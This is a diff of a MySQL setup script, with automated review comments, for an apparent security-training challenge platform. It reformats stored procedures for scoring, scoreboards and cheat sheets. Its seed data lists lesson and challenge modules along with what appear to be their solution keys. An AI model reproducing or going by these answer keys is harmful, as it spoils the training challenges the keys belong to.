+CREATE PROCEDURE `core`.`moduleGetIdFromHash` (IN theHash VARCHAR(191))
BEGIN
- COMMIT;
- SELECT moduleId
- FROM modules
+COMMIT;
+SELECT moduleId FROM modules
WHERE moduleHash = theHash;
END
@@ -1269,11 +1105,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userGetNameById`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`userGetNameById` (IN theUserId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT userName
- FROM users
+COMMIT;
+SELECT userName FROM users
WHERE userId = theUserId;
END
-- $$
@@ -1286,11 +1121,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userGetIdByName`(IN theUserName VARCHAR(64))
+CREATE PROCEDURE `core`.`userGetIdByName` (IN theUserName VARCHAR(64))
BEGIN
- COMMIT;
- SELECT userId
- FROM users
+COMMIT;
+SELECT userId FROM users
WHERE userName = theUserName;
END
-- $$
@@ -1303,11 +1137,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userClassId`(IN theUserName VARCHAR(64))
+CREATE PROCEDURE `core`.`userClassId` (IN theUserName VARCHAR(64))
BEGIN
- COMMIT;
- SELECT classId
- FROM users
+COMMIT;
+SELECT classId FROM users
WHERE userName = theUserName;
END
-- $$
@@ -1320,24 +1153,20 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userBadSubmission`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`userBadSubmission` (IN theUserId VARCHAR(64))
BEGIN
- UPDATE users
- SET badSubmissionCount = badSubmissionCount + 1
+UPDATE users SET
+ badSubmissionCount = badSubmissionCount + 1
WHERE userId = theUserId;
- COMMIT;
- UPDATE users
- SET userScore = userScore - userScore / 10
- WHERE userId = theUserId
- AND badSubmissionCount > 40
- AND userScore > 5;
- COMMIT;
- UPDATE users
- SET userScore = userScore - 10
- WHERE userId = theUserId
- AND badSubmissionCount > 40
- AND userScore <= 5;
- COMMIT;
+COMMIT;
+UPDATE users SET
+ userScore = userScore - userScore/10
+ WHERE userId = theUserId AND badSubmissionCount > 40 AND userScore > 5;
+COMMIT;
+UPDATE users SET
+ userScore = userScore - 10
+ WHERE userId = theUserId AND badSubmissionCount > 40 AND userScore <= 5;
+COMMIT;
END
-- $$
-- DELIMITER ;
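Review bot: The two score penalties in `userBadSubmission` run one after the other, so a score that the first `UPDATE` reduces to 5 or below is then matched by the second `UPDATE` (`userScore <= 5`) and loses a further 10 in the same call. With an integer `userScore` column (the type is not visible in this hunk) a score of 6 would become 5 and then -5. Selecting the branch in one statement avoids this: `UPDATE users SET userScore = IF(userScore > 5, userScore - userScore/10, userScore - 10) WHERE userId = theUserId AND badSubmissionCount > 40;`.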
@@ -1349,12 +1178,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`resetUserBadSubmission`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`resetUserBadSubmission` (IN theUserId VARCHAR(64))
BEGIN
- UPDATE users
- SET badSubmissionCount = 0
+UPDATE users SET
+ badSubmissionCount = 0
WHERE userId = theUserId;
- COMMIT;
+COMMIT;
END
-- $$
-- DELIMITER ;
@@ -1366,19 +1195,18 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleComplete`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleComplete` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
BEGIN
- DECLARE theDate DATETIME;
- COMMIT;
- SELECT NOW()
- FROM DUAL
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL
INTO theDate;
- UPDATE results
- SET finishTime = theDate
+UPDATE results SET
+ finishTime = theDate
WHERE startTime IS NOT NULL
- AND moduleId = theModuleId
- AND userId = theUserId;
- COMMIT;
+ AND moduleId = theModuleId
+ AND userId = theUserId;
+COMMIT;
END
-- $$
@@ -1390,25 +1218,25 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`cheatSheetCreate`(IN theModule VARCHAR(64), IN theSheet LONGTEXT)
+CREATE PROCEDURE `core`.`cheatSheetCreate` (IN theModule VARCHAR(64), IN theSheet LONGTEXT)
BEGIN
- DECLARE theDate DATETIME;
- DECLARE theId VARCHAR(64);
+DECLARE theDate DATETIME;
+DECLARE theId VARCHAR(64);
COMMIT;
- UPDATE sequence
- SET currVal = currVal + 1
- WHERE tableName = 'cheatSheet';
+ UPDATE sequence SET
+ currVal = currVal + 1
+ WHERE tableName = 'cheatSheet';
COMMIT;
- SELECT NOW() FROM DUAL INTO theDate;
+ SELECT NOW() FROM DUAL INTO theDate;
- SELECT SHA(CONCAT(currVal, tableName, theDate))
- FROM `core`.`sequence`
- WHERE tableName = 'cheatSheet'
- INTO theId;
+ SELECT SHA(CONCAT(currVal, tableName, theDate)) FROM `core`.`sequence`
+ WHERE tableName = 'cheatSheet'
+ INTO theId;
INSERT INTO `core`.`cheatsheet`
(cheatSheetId, moduleId, createDate, solution)
- VALUES (theId, theModule, theDate, theSheet);
+ VALUES
+ (theId, theModule, theDate, theSheet);
COMMIT;
END
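Review bot: `cheatSheetCreate` increments `sequence.currVal`, commits, and reads it back in a separate `SELECT SHA(CONCAT(currVal, tableName, theDate))`, so two calls that overlap within the same second can read the same `currVal` and `theDate` and compute the same `theId`. If `cheatSheetId` is a unique key (not visible in this hunk) the second `INSERT` then fails; if it is not, two rows share an id. Removing the `COMMIT` between the `UPDATE` and the `SELECT` would keep the row lock until the id is derived, provided the procedure runs inside a transaction, or the id could come from `UUID()` instead of the counter and timestamp.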
@@ -1421,11 +1249,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetAll`()
+CREATE PROCEDURE `core`.`moduleGetAll` ()
BEGIN
- COMMIT;
- SELECT moduleId, moduleName, moduleType, moduleCategory
- FROM modules
+COMMIT;
+SELECT moduleId, moduleName, moduleType, moduleCategory FROM modules
ORDER BY moduleType, moduleCategory, moduleName;
END
-- $$
@@ -1437,12 +1264,11 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`cheatSheetGetSolution`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`cheatSheetGetSolution` (IN theModuleId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT moduleName, solution
- FROM modules
- JOIN cheatsheet USING (moduleId)
+COMMIT;
+SELECT moduleName, solution FROM modules
+ JOIN cheatsheet USING (moduleId)
WHERE moduleId = theModuleID
ORDER BY createDate DESC;
END
@@ -1455,11 +1281,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleGetHashById`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleGetHashById` (IN theModuleId VARCHAR(64))
BEGIN
- COMMIT;
- SELECT moduleHash
- FROM modules
+COMMIT;
+SELECT moduleHash FROM modules
WHERE moduleId = theModuleId;
END
@@ -1472,18 +1297,17 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userCheckResult`(IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`userCheckResult` (IN theModuleId VARCHAR(64), IN theUserId VARCHAR(64))
BEGIN
- COMMIT;
+COMMIT;
-- Returns a module Name if the user has not completed the module identified by moduleId
- SELECT moduleName
- FROM results
- JOIN modules USING (moduleId)
+SELECT moduleName FROM results
+ JOIN modules USING(moduleId)
WHERE finishTime IS NULL
- AND startTime IS NOT NULL
- AND finishTime IS NULL
- AND userId = theUserId
- AND moduleId = theModuleId;
+ AND startTime IS NOT NULL
+ AND finishTime IS NULL
+ AND userId = theUserId
+ AND moduleId = theModuleId;
END
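Review bot: The `WHERE` clause of `userCheckResult` tests `finishTime IS NULL` twice, once as the first predicate and again after `startTime IS NOT NULL`. The repetition does not change the result but reads as if a different condition was intended; I would remove the second occurrence so the filter is `finishTime IS NULL AND startTime IS NOT NULL AND userId = theUserId AND moduleId = theModuleId`. The duplicate is present on both sides of the hunk.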
@@ -1496,22 +1320,9 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleIncrementalInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleIncrementalInfo` (IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- UNION
- (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank
- FROM modules
- WHERE moduleStatus = 'open'
- AND moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId))
- ORDER BY incrementalRank;
+(SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank FROM modules WHERE moduleStatus = 'open' AND moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId)) ORDER BY incrementalRank;
END
-- $$
@@ -1523,18 +1334,13 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleFeedback`(IN theModuleId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleFeedback` (IN theModuleId VARCHAR(64))
BEGIN
- SELECT userName,
- TIMESTAMPDIFF(MINUTE, finishTime, startTime) * (-1),
- difficulty,
- knowledgeBefore,
- knowledgeAfter,
- resultSubmission
- FROM modules
- LEFT JOIN results USING (moduleId)
- LEFT JOIN users USING (userId)
- WHERE moduleId = theModuleId;
+SELECT userName, TIMESTAMPDIFF(MINUTE, finishTime, startTime)*(-1), difficulty, knowledgeBefore, knowledgeAfter, resultSubmission
+ FROM modules
+ LEFT JOIN results USING (moduleId)
+ LEFT JOIN users USING (userId)
+ WHERE moduleId = theModuleId;
END
-- $$
-- DELIMITER ;
@@ -1545,26 +1351,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userProgress`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`userProgress` (IN theClassId VARCHAR(64))
BEGIN
COMMIT;
- SELECT userName, count(finishTime), userScore
- FROM users
- JOIN results USING (userId)
- WHERE finishTime IS NOT NULL
- AND classId = theClassId
- GROUP BY userName
- UNION
- SELECT userName, 0, userScore
- FROM users
- WHERE classId = theClassId
- AND userId NOT IN (SELECT userId
- FROM users
- JOIN results USING (userId)
- WHERE classId = theClassId
- AND finishTime IS NOT NULL
- GROUP BY userName)
- ORDER BY userScore DESC;
+SELECT userName, count(finishTime), userScore FROM users JOIN results USING (userId) WHERE finishTime IS NOT NULL
+AND classId = theClassId
+GROUP BY userName UNION SELECT userName, 0, userScore FROM users WHERE classId = theClassId AND userId NOT IN (SELECT userId FROM users JOIN results USING (userId) WHERE classId = theClassId AND finishTime IS NOT NULL GROUP BY userName) ORDER BY userScore DESC;
END
-- $$
@@ -1577,15 +1369,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`classScoreboard`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`classScoreboard` (IN theClassId VARCHAR(64))
BEGIN
COMMIT;
- SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount
- FROM users
- WHERE classId = theClassId
- AND userRole = 'player'
- AND userScore > 0
- ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
+SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount FROM users
+ WHERE classId = theClassId AND userRole = 'player' AND userScore > 0
+ ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
END
-- $$
@@ -1598,14 +1387,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`totalScoreboard`()
+CREATE PROCEDURE `core`.`totalScoreboard` ()
BEGIN
COMMIT;
- SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount
- FROM users
- WHERE userRole = 'player'
- AND userScore > 0
- ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
+SELECT userId, userName, userScore, goldMedalCount, silverMedalCount, bronzeMedalCount FROM users
+ WHERE userRole = 'player' AND userScore > 0
+ ORDER BY userScore DESC, goldMedalCount DESC, silverMedalCount DESC, bronzeMedalCount DESC, userId ASC;
END
-- $$
@@ -1618,18 +1405,15 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userStats`(IN theUserName VARCHAR(32))
+CREATE PROCEDURE `core`.`userStats` (IN theUserName VARCHAR(32))
BEGIN
- DECLARE temp INT;
- SELECT COUNT(*) FROM modules INTO temp;
- SELECT userName,
- sum(TIMESTAMPDIFF(MINUTE, finishTime, startTime) * (-1)) AS "Time",
- CONCAT(COUNT(*), "/", temp) AS "Progress"
+DECLARE temp INT;
+SELECT COUNT(*) FROM modules INTO temp;
+SELECT userName, sum(TIMESTAMPDIFF(MINUTE, finishTime, startTime)*(-1)) AS "Time", CONCAT(COUNT(*),"/", temp) AS "Progress"
FROM modules
- LEFT JOIN results USING (moduleId)
- LEFT JOIN users USING (userId)
- WHERE userName = theUserName
- AND resultSubmission IS NOT NULL
+ LEFT JOIN results USING (moduleId)
+ LEFT JOIN users USING (userId)
+ WHERE userName = theUserName AND resultSubmission IS NOT NULL
GROUP BY userName;
END
@@ -1642,16 +1426,15 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`userStatsDetailed`(IN theUserName VARCHAR(32))
+CREATE PROCEDURE `core`.`userStatsDetailed` (IN theUserName VARCHAR(32))
BEGIN
- DECLARE temp INT;
- SELECT COUNT(*) FROM modules INTO temp;
- SELECT userName, moduleName, TIMESTAMPDIFF(MINUTE, finishTime, startTime) * (-1) AS "Time"
+DECLARE temp INT;
+SELECT COUNT(*) FROM modules INTO temp;
+SELECT userName, moduleName, TIMESTAMPDIFF(MINUTE, finishTime, startTime)*(-1) AS "Time"
FROM modules
- LEFT JOIN results USING (moduleId)
- LEFT JOIN users USING (userId)
- WHERE userName = theUserName
- AND resultSubmission IS NOT NULL
+ LEFT JOIN results USING (moduleId)
+ LEFT JOIN users USING (userId)
+ WHERE userName = theUserName AND resultSubmission IS NOT NULL
ORDER BY incrementalRank;
END
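Review bot: `userStatsDetailed` declares `temp` and fills it with `SELECT COUNT(*) FROM modules INTO temp;`, but the query that follows never reads it, so every call pays for a count it discards. It looks copied from `userStats`, where `temp` feeds the `"Progress"` column; here both lines can be removed. The `csrfLevelComplete` hunk has the same leftover `DECLARE temp INT;` with no use.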
@@ -1664,23 +1447,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleOpenInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleOpenInfo` (IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleName, moduleCategory, moduleId, finishTime
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- UNION
- (SELECT moduleName, moduleCategory, moduleId, null
- FROM modules
- WHERE moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- AND moduleStatus = 'open')
- ORDER BY moduleCategory, moduleName;
+(SELECT moduleName, moduleCategory, moduleId, finishTime FROM modules LEFT JOIN results USING (moduleId)
+WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleName, moduleCategory, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') AND moduleStatus = 'open') ORDER BY moduleCategory, moduleName;
END
-- $$
@@ -1692,23 +1462,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleClosednfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleClosednfo` (IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleName, moduleCategory, moduleId, finishTime
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'closed')
- UNION
- (SELECT moduleName, moduleCategory, moduleId, null
- FROM modules
- WHERE moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'closed')
- AND moduleStatus = 'closed')
- ORDER BY moduleCategory, moduleName;
+(SELECT moduleName, moduleCategory, moduleId, finishTime
+FROM modules LEFT JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'closed') UNION (SELECT moduleName, moduleCategory, moduleId, null FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'closed') AND moduleStatus = 'closed') ORDER BY moduleCategory, moduleName;
END
-- $$
-- DELIMITER ;
@@ -1720,23 +1477,10 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleTournamentOpenInfo`(IN theUserId VARCHAR(64))
+CREATE PROCEDURE `core`.`moduleTournamentOpenInfo` (IN theUserId VARCHAR(64))
BEGIN
- (SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank, scoreValue
- FROM modules
- LEFT JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- UNION
- (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank, scoreValue
- FROM modules
- WHERE moduleId NOT IN (SELECT moduleId
- FROM modules
- JOIN results USING (moduleId)
- WHERE userId = theUserId
- AND moduleStatus = 'open')
- AND moduleStatus = 'open')
- ORDER BY incrementalRank, scoreValue, moduleNameLangPointer;
+(SELECT moduleNameLangPointer, moduleCategory, moduleId, finishTime, incrementalRank, scoreValue FROM modules LEFT JOIN results USING (moduleId)
+WHERE userId = theUserId AND moduleStatus = 'open') UNION (SELECT moduleNameLangPointer, moduleCategory, moduleId, null, incrementalRank, scoreValue FROM modules WHERE moduleId NOT IN (SELECT moduleId FROM modules JOIN results USING (moduleId) WHERE userId = theUserId AND moduleStatus = 'open') AND moduleStatus = 'open') ORDER BY incrementalRank, scoreValue, moduleNameLangPointer;
END
-- $$
@@ -1749,12 +1493,12 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleSetStatus`(IN theModuleId VARCHAR(64), IN theStatus VARCHAR(16))
+CREATE PROCEDURE `core`.`moduleSetStatus` (IN theModuleId VARCHAR(64), IN theStatus VARCHAR(16))
BEGIN
- UPDATE modules
- SET moduleStatus = theStatus
+UPDATE modules SET
+ moduleStatus = theStatus
WHERE moduleId = theModuleId;
- COMMIT;
+COMMIT;
END
-- $$
-- DELIMITER ;
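Review bot: `moduleSetStatus` writes `theStatus` into `modules.moduleStatus` without checking it, while the listing procedures visible in this diff filter only on `'open'` and `'closed'`. Unless the column definition (not visible here) already restricts the values, any other string of up to 16 characters would make the module drop out of both listings. A guard before the `UPDATE`, such as `IF theStatus NOT IN ('open', 'closed') THEN SIGNAL SQLSTATE '45000' SET MESSAGE_TEXT = 'invalid module status'; END IF;`, would make the accepted set explicit. Adjust the list if the schema allows further states.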
@@ -1765,686 +1509,178 @@ END
USE `core`;
-- DELIMITER $$
-CREATE PROCEDURE `core`.`moduleAllStatus`()
+CREATE PROCEDURE `core`.`moduleAllStatus` ()
BEGIN
- SELECT moduleId, moduleName, moduleStatus
+SELECT moduleId, moduleName, moduleStatus
FROM modules;
END
-- $$
-- DELIMITER ;
;
-SET SQL_MODE = @OLD_SQL_MODE;
-SET FOREIGN_KEY_CHECKS = @OLD_FOREIGN_KEY_CHECKS;
-SET UNIQUE_CHECKS = @OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-SELECT "Data for table `core`.`sequence`"
-FROM DUAL;
+SELECT "Data for table `core`.`sequence`" FROM DUAL;
-- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
USE `core`;
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('users', '282475249');
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('cheatSheet', '282475299');
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('class', '282475249');
-INSERT INTO `core`.`sequence` (`tableName`, `currVal`)
-VALUES ('modules', '282475576');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('users', '282475249');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('cheatSheet', '282475299');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('class', '282475249');
+INSERT INTO `core`.`sequence` (`tableName`, `currVal`) VALUES ('modules', '282475576');
COMMIT;
-- -----------------------------------------------------
-SELECT "Data for table `core`.`settings`"
-FROM DUAL;
+SELECT "Data for table `core`.`settings`" FROM DUAL;
-- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
USE `core`;
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('adminCheatsEnabled', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('playerCheatsEnabled', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('moduleLayout', 'ctf');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('enableFeedback', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('openRegistration', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('scoreboardStatus', 'open');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('scoreboardClass', '');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('hasStartTime', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('startTime', '2019-01-01T12:00:00');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('hasLockTime', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('lockTime', '2020-01-01T12:00:00');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('hasEndTime', false);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('endTime', '2020-02-01T12:00:00');
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('enableTranslations', true);
-INSERT INTO `core`.`settings` (`setting`, `value`)
-VALUES ('defaultClass', '');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('adminCheatsEnabled', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('playerCheatsEnabled', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('moduleLayout', 'ctf');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('enableFeedback', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('openRegistration', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('scoreboardStatus', 'open');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('scoreboardClass', '');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('hasStartTime', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('startTime', '2019-01-01T12:00:00');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('hasLockTime', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('lockTime', '2020-01-01T12:00:00');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('hasEndTime', false);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('endTime', '2020-02-01T12:00:00');
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('enableTranslations', true);
+INSERT INTO `core`.`settings` (`setting`, `value`) VALUES ('defaultClass', '');
COMMIT;
-- -----------------------------------------------------
-SELECT "Inserting Data for table `core`.`modules`"
-FROM DUAL;
+SELECT "Inserting Data for table `core`.`modules`" FROM DUAL;
-- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
USE `core`;
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0dbea4cb5811fff0527184f99bd5034ca9286f11', 'Insecure Direct Object References',
- 'insecure.direct.object.references', 'lesson', 'Insecure Direct Object References',
- 'insecure.direct.object.references', '59e571b1e59441e76e0c85e5b49',
- 'fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100', 'open', '5', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('b9d82aa7b46ddaddb6acfe470452a8362136a31e', 'Poor Data Validation', 'poor.data.validation', 'lesson',
- 'Poor Data Validation', 'poor.data.validation',
- '6680b08b175c9f3d521764b41349fcbd3c0ad0a76655a10d42372ebccdfdb4bb',
- '4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f', 'open', '6', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('bf847c4a8153d487d6ec36f4fca9b77749597c64', 'Security Misconfiguration', 'security.misconfiguration', 'lesson',
- 'Security Misconfigurations', 'security.misconfigurations',
- '55b34717d014a5a355f6eced4386878fab0b2793e1d1dbfd23e6262cd510ea96',
- 'fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833', 'open', '7', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('9533e21e285621a676bec58fc089065dec1f59f5', 'Broken Session Management', 'broken.session.management', 'lesson',
- 'Session Management', 'session.management', '6594dec9ff7c4e60d9f8945ca0d4',
- 'b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806', 'open', '16', '10', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access',
- 'lesson', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'f60d1337ac4d35cb67880a3adda79',
- 'oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3', 'open', '25', '15', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', 'Cross Site Scripting', 'cross.site.scripting', 'lesson', 'XSS',
- 'xss', 'ea7b563b2935d8587539d747d', 'zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a', 'open',
- '26', '15', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('cd7f70faed73d2457219b951e714ebe5775515d8', 'Cross Site Scripting 1', 'cross.site.scripting.1', 'challenge',
- 'XSS', 'xss', '445d0db4a8fc5d4acb164d022b', 'd72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa',
- 'open', '35', '20', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('53a53a66cb3bf3e4c665c442425ca90e29536edd', 'Insecure Data Storage', 'insecure.data.storage', 'lesson',
- 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'Battery777',
- 'ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f', 'open', '45', '25', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
